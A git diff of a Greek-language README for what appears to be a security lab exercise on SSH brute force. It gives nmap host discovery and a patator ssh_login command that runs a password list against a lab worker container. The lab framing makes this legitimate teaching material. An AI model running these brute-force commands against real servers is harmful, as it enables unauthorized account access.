Browse Source

Update '2. SSH Brute Force/README.md'

master
AndreasNefeli 4 years ago
parent
commit
a46fb2c68c
  1. 10
      2. SSH Brute Force/README.md

10
2. SSH Brute Force/README.md

@ -12,10 +12,15 @@
4. git clone https://github.com/lanjelot/patator.git** 4. git clone https://github.com/lanjelot/patator.git**
_______________________________________________________________________________________ _______________________________________________________________________________________
Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση. Αφού ολοκλρωθεί η εγκατάσταση, συνδεόμαστε στον master, από τον οποίο θα υλοποιηθεί και η επίθεση.
**1. sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login** **sudo ../swarmlab-sec/install/usr/share/swarmlab.io/sec/swarmlab-sec login**
**Σημείωση:** Προκειμένου να μάθουμε ποια εντολή πρέπει να χρησιμοποιήσουμε για τη συγκεκριμένη επίθεση, ανατρέξαμε στο documentation της patator, μέσω των εντολών:
**1. python patator.py
2. python patator.py ssh_login** (καθώς αυτή είναι η επίθεση που μας ενδιαφέρει.)
Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης. Έπειτα, δημιουργήσαμε και τρέξαμε ένα script master.sh, το οποίο περιέχει όλες τις εντολές για την υλοποιήση της επίθεσης.
**2. ./master.sh** **./master.sh**
**master.sh** **master.sh**
@ -31,6 +36,7 @@ ________________________________________________________________________________
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')**
* Με την ακόλουθη εντολή εκτελείτε η επίθεση.
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker**
#emfanizei kai tis apotyximenes prospatheies #emfanizei kai tis apotyximenes prospatheies

Loading…
Cancel
Save